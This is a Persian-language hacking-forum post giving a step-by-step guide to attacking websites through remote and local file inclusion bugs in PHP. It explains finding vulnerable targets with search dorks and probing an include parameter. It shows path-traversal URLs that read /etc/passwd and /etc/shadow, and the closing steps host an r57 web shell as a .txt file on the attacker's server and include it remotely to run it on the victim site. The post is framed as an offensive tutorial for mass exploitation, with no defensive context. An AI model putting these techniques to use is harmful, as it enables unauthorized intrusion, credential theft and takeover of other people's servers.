رفتن به مطلب



iran rules jazbe modir
ADS mahak

eblis98

آموزش هک سایت با باگ های rfi و lfi (توضیحی)

پست های پیشنهاد شده

با سلام:19:
آموزش هک سایت با باگ های rfi و lfi

ین باگها یکی از بهترین باگها جهت هک سایت هستند اگر چه یکم قدیمی است اما آنقدر تارگت دارد که اگر نیم ساعت خود را برای پیدا کردن تارگت های این باگ اختصاص بدهید ۱۰۰ تارگت پیدا میکنید…
RFI مخفف Remote File Include و LFI مخفف Local file Include است یعنی دسترسی برای خواندن فایل ها اسکریپت ها …یک سایت.
این باگ هنگامی بوجود میاید که برنامه نویس سایت دچار اشتباه در استفاده از دستورات فراخوانی در PHP میشود و هکر میتواند که دسترسی غیری مجاز به فایل های مانند config.php etc/passwd

پیدا کند نحوه استفاده از این باگ مختلف میباشد مثلا شما میتوانید با خلاقیت خود از این باگ در سایت های مختلف استفاده کنید من کوشش میکنم که استفاده از این باگها را بشکل عمومی آموزش بدم …
برای پیدا کردن target که دارای باگ باشد شما نیاز به دورک های RFI/LFI دارید من تمامی دورک های این باگ را در آدرس زیر قرار داده ام که شما میتوانید مشاهده کنید:

برای مشاهده ی این بخش لطفا وارد حساب کابری خود شوید یا اگر عضو نیستید از این قسمت عضو سایت شوید

Dorks.txt
من دورک زیر را انتخاب کردم:
index.php?site=…
این دورک یکی از بهترین و پرکاربردترین دورکی RFI/LFI است خوب من Target خودwww.site.com را انتخاب میکنم حالا دورک را به آدرس این تارگیت اضافه

میکنم:www.site.com/index.php?site=command
من در آخر آدرس این سایت بخاطری Command نوشتم که شما در همین محل دستورات خود را اجرا میکنید ما میتوانیم در این قسمت فایل های خودی سایت را فراخوانی کنیم ویا با استفاده از یک لینک دیگر

شل خودمون را بریزیم توی سایت و یا لیست etc/passwd را بخوانیم….باید توجه داشته باشید که لینک شل شما txt باشه نه PHP مانند این لینک:

برای مشاهده ی این بخش لطفا وارد حساب کابری خود شوید یا اگر عضو نیستید از این قسمت عضو سایت شوید


برای اینکه بفهمیم این سایت باگ دارد یانه در آدرس سایت بعوض command اسمی صفحه اصلی سایت را مینویسیم:
www.site.com/index.php?site=index.php
اگر فایل index.php بدون کدام مشکل اجرا شد پس سایت باگ دارد همچنان میتوانید برای اینکه بفهمید سایت باگ داره یا نه عبارت qwe را در آدرس سایت بنویسید:
www.site.com/index.php?site=qwe
حالا با وارد کردن این عبارت اگر سایت باگ داشت با Warning روبرو میشوید و اگر باگ نداشت صفحه سایت بدون کدام مشکل بالا میاد.
بعد از اینکه یک Target خوب پیدا کردید مراحل بعدی را تعقیب کنید:
در این قسمت من به شما آموزش میدم چجوری محتویات فایل های مهم سرور را بخوانید و دستورات خود را اجرا کنید به لینک سایت هدف عبارت زیر را اضافه کنید:
www.site.com/index.php?site=../etc/passwd
www.site.com/index.php?site=../etc/shadow 

برای مشاهده ی این بخش لطفا وارد حساب کابری خود شوید یا اگر عضو نیستید از این قسمت عضو سایت شوید


www.site.com/index.php?site=../etc/security/user
هر یک از فابل های بالا خیلی خیلی مهم است اگر اسن فابل های یک سایت را توانستید بخوانید دیگه کاری سایت تموم است من در قسمت بالا از یک …/ کار گرفتم شما باید به اندازه پوشه های که توش هستید

از ../ کار بگیرید من صرف یک پوشه از Root سایت در لینک بالا فاصله دارم که اون پوشه site است اگر سایت شما لینکش مانند این لینک بود:
www.site2.com/bb/cc/h1/index.php
شما باید از ../../../../ کار بگیرید یعنی چهار پوشه به عقب میروید تا به root سایت دسترسی داشته باشید اگر از لینک بالا بخواهیم فایل etc/passwd را بخواینم اینکار را میکنیم:

برای مشاهده ی این بخش لطفا وارد حساب کابری خود شوید یا اگر عضو نیستید از این قسمت عضو سایت شوید


دیدید که من از ../../../../ استفاده کردم برای اینکه بتوانید یک وب هکر حرفه ای شوید باید حتما PHP را بلد باشید در ضمن یک لوکال هاست را نیز بروی کامپیوتری خود نصب کنید…
ار میخواهید که شل خودتون را بروی سرور سایت نصب کنید باید پسوند شل خود را از .php به .txt تغییر بدهید و بعد در یک هاست آپلودش کنید و آدرس شل خود را در آخر لینک سایت هدف بنویسید و

بعد واردی اون لینک شوید خواهید دید که شل شما اجرا شده ….به مثال پایین دقت کنید:
shell name:r57.php
changed name:r57.txt 
shell Address:www.yourhost.com/r57.txt 
target URL:www.site.com/index.php?=here past your shell address 
hack link:www.site.com/index.php?=www.yourhost.com/r57.txt 
Now run Your Shell !!!
خوب امیدوارم که از مثال بالا فهمیده باشید که چجوری شل خودتون را با استفاده از باگ LFI/RFI روی سرور سایت آپلود کنید...
 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

telegram channel   jazbe modir

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   بازگردانی قالب بندی

  حداکثر استفاده از ۷۵ شکلک مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به عنوان یک لینک به جای

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

در حال بارگذاری

  • کاربران آنلاین در این صفحه   0 کاربر

    هیچ کاربر عضوی،در حال مشاهده این صفحه نیست.

×
×
  • جدید...